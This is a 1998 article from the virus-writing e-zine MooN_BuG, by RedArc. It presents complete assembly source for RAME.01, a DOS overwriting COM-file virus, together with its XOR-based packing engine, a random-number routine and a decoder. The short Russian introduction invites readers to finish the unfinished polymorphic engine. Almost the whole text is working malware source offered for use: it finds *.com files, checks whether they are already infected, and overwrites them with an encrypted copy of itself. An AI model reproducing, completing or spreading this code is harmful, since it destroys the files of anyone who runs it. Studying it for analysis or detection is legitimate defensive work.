[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 7, Sep 1998 file 00E
Вирус RAME.01
by RedArc
Собственно здесь разрабатывалась полиморфная ангина, основывающаяся на
архивировании. Но доделывать мне ее оказалось лень. Может быть вы попробуете?
=== CUT === RAME01.ASM
;COM.OverWrite RAME.Trivial.01 1998 (c) by RedArc
Model Tiny
.286
.code
org 100h
start:
mov bh, 00h
mov si,SOURCE_OFFS
mov cx,256h
mov di,si
add di,cx
call UnRAME
push si
xchg si,di
mov cx,SOURCE_LENGTH
rep movsb
ret
;---
include unrame.asm
;---
Header_Length equ $-start
SOURCE:
SOURCE_OFFS equ $-start + 100h
mov ah,4eh
mov cx,0fh
mov dx,MASK_OFS
Interrupt:
int 21h
jb FileNotFound
jmp short TestFile
FileNotFound:
mov ax,4c00h
int 21h
TestFile:
mov ax,3d02h
mov dx,9eh
int 21h
xchg ax,bx
mov ah,3fh
mov dx,BUFF
mov cx,2
int 21h
mov al,byte ptr ds:[BUFF]
mov dl,byte ptr ds:[100h]
sub al,dl
cmp al,0
je CloseFile
jmp short Infect
CloseFile:
mov ah,3eh
int 21h
mov ah,4fh
jmp Interrupt
Infect:
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
push bx
mov bx,0feh
call RND
inc ax
xchg ax,bx
mov byte ptr ds:[101h],bh
mov si, SOURCE_OFFS
mov cx, MyLength
mov di, cx
add di,100h
call RAME
pop bx
mov word ptr ds:[106h],cx
push cx
mov ah,40h
xor dx,dx
inc dh
mov cx,Header_Length
int 21h
pop cx
mov ah,40h
mov dx,MyLength + 100h
int 21h
jmp CloseFile
;---
include rame.asm
include rame_rnd.inc
;---
BUFF equ $-start + 100h
dw ?
MASK_OFS equ $-start + 100h
db '*.com',0h
SOURCE_LENGTH equ $-SOURCE
MyLength equ $-start
end start
=== CUT ===
=== CUT === RAME.ASM
; RAME
; (c) by RedArc // TAVC
;------------------------------
; Main procedure RAME
;------------------------------
;Input:
; DS:SI - source code
; ES:DI - destion buffer
; CX - length to code
; BH - Byte for XOR
;Output:
; CX - new length
;Destroy:
; None
; --- Main generator ---
RAME proc near
push ax bx dx si di bp
cld
call RAME1
RAME1:
mov bl,0
mov bp,8
@@0:
lodsw
xchg ah,al
cmp cx,2
jc l_1
sub cx,2
jmp short l_1_1
l_1:
xor cx,cx
l_1_1:
xor ah,bh
xor al,bh
@@1:
cmp ah,16
jc @@2
call SetFlagsB1
dec bp
cmp bp,2
jc @@1_1
jmp short @@1_
@@1_1:
call SetFlagsB1
_1_:
jmp _LOOP_
@@1_:
lodsb
xor al,bh
cmp cx,0
je l_2
dec cx
l_2:
jmp short @@1
@@2:
cmp bp,2
jc @@1_1
cmp al,16
jc @@3
call SetFlagsB1
dec bp
call SetFlagsB1
dec bp
_2_1:
cmp bp,0
jne @@2_
jmp short _1_
@@2_:
cmp bp,1
je _2_
jmp @@0
_2_:
lodsb
xor al,bh
cmp cx,0
je l_3
dec cx
l_3:
xchg ah,al
call SetFlagsB1
dec bp
jmp short _1_
@@3:
shl al,4
add ah,al
call SaveArch
dec bp
cmp bp,0
je _LOOP_
cmp bp,2
jnc @@3_1
lodsb
xor al,bh
cmp cx,0
je @@3_1_
dec cx
@@3_1_:
xchg ah,al
call SetFlagsB1
dec bp
jmp short _LOOP_
@@3_1:
jmp @@0
_LOOP_:
pop dx
xchg dx,si
push si
push cx
xchg bx,ax
stosb
xchg bx,ax
mov cx,8
add si,Table8Bytes
l1:
lodsb
stosb
loop l1
pop cx
xchg dx,si
_l1:
cmp cx,0
je l2
jmp RAME1
l2:
pop ax
pop bp
push di
pop cx
pop di
sub cx,di
pop si
pop dx
pop bx
pop ax
ret
RAME endp
;============================
Table8Bytes equ $-RAME1
Bytes db 8 dup (?)
db ?
InfoRAME db 'RAME v.01 by RedArc'
;--------
SaveArch:
SA1:
xchg ah,al
xchg dx,si
xchg di,sp
mov si,[di+2]
xchg di,sp
add si,Table8Bytes
push bp
push ax
mov ax,8
sub ax,bp
mov bp,ax
pop ax
mov byte ptr cs:[si+bp],al
pop bp
xchg dx,si
ret
;--------
SetFlagsB1:
push cx
xor cx,cx
mov cx,bp
stc
rcr ch,cl
or bl,ch
pop cx
jmp SA1
;--------
=== CUT ===
=== CUT === RAME_RND.INC
; RAME
; (c) by RedArc // TAVC
;------------------------------
; Random procedure RAME
;------------------------------
;Input:
; BX - some max value
;Output:
; AX - rnd value [0..bx]
;Destroy:
; BX, AX
;Вход: AX - some_value (максимальное значение для случайной величины)
;Выход: AX - random_value (от нуля до some_value)
rnd proc near
push ds di dx cx bx ax
call @@r0
@@r0:
pop di
push cs
pop ds
add di,randomize
mov bx,word ptr ds:[di]
shr bx,1
mov ah,2ch
int 21h
pop ax
@@r1:
xor cx,bx
push cx
@@r2:
xor dx,bx
xor bx,ax
not bx
add bx,dx
neg bx
xor bx,dx
loop @@r2
pop cx
xor cx,bx
xor ch,cl
add ch,dh
sub ch,dl
mov cl,dl
rol cx,1
xor cx,dx
xchg ax,bx
pop bx
push bx
cmp bx,0ffh
jnc @@rr
@@rr3:
cmp cl,0ffh
jc @@rr2
inc ch
xchg ch,cl
xor cl,ch
sub cl,1
jmp short @@rr3
@@rr2:
cmp cl,bl
jmp short @@rr1
@@rr:
cmp cx,bx
@@rr1:
xchg ax,bx
jnc @@r3
jmp short @@r4
@@r3:
xor dh,dl
add dh,dl
xchg dh,dl
ror dx,cl
sub bx,2
jmp short @@r1
@@r4:
xchg cx,ax
mov word ptr ds:[di],ax
pop bx cx dx di ds
ret
randomize equ $-@@r0
dw 2406h
rnd endp
=== CUT ===
=== CUT === UNRAME.ASM
; RAME
; (c) by RedArc // TAVC
;------------------------------
; Procedure UnRAME
;------------------------------
;Input:
; DS:SI - source code
; ES:DI - destion buffer
; CX - length to code
; BH - Byte for XOR
;Output:
; CX - new length
;Destroy:
; None
UnRAME proc near
push ax bx dx si di bp
cld
NewMaxZikl:
lodsb
mov bp,0
mov bl,al
NewMinZikl:
inc bp
lodsb
call GetFlagsB1
jnz SaveByteNoDeCoder
push bx
mov bh,al
and bh,15
mov bl,al
shr bl,4
xchg ax,bx
pop bx
xor ah,bh
xor al,bh
xchg ah,al ;!!!
stosw
jmp EndMinZikl
SaveByteNoDeCoder:
xor al,bh
stosb
EndMinZikl:
cmp bp,8
jl NewMinZikl
loop NewMaxZikl
EndMaxZikl:
pop bp
push di
pop cx
pop di
sub cx,di
pop si
pop dx
pop bx
pop ax
ret
UnRAME endp
GetFlagsB1:
xchg ax,bx
cmp bp,1
jne u_1
test al,10000000b
jmp GA1
u_1:
cmp bp,2
jne u_2
test al,01000000b
jmp GA1
u_2:
cmp bp,3
jne u_3
test al,00100000b
jmp GA1
u_3:
cmp bp,4
jne u_4
test al,00010000b
jmp GA1
u_4:
cmp bp,5
jne u_5
test al,00001000b
jmp GA1
u_5:
cmp bp,6
jne u_6
test al,00000100b
jmp GA1
u_6:
cmp bp,7
jne u_7
test al,00000010b
jmp GA1
u_7:
test al,00000001b
GA1:
xchg ax,bx
ret
;--------
=== CUT ===
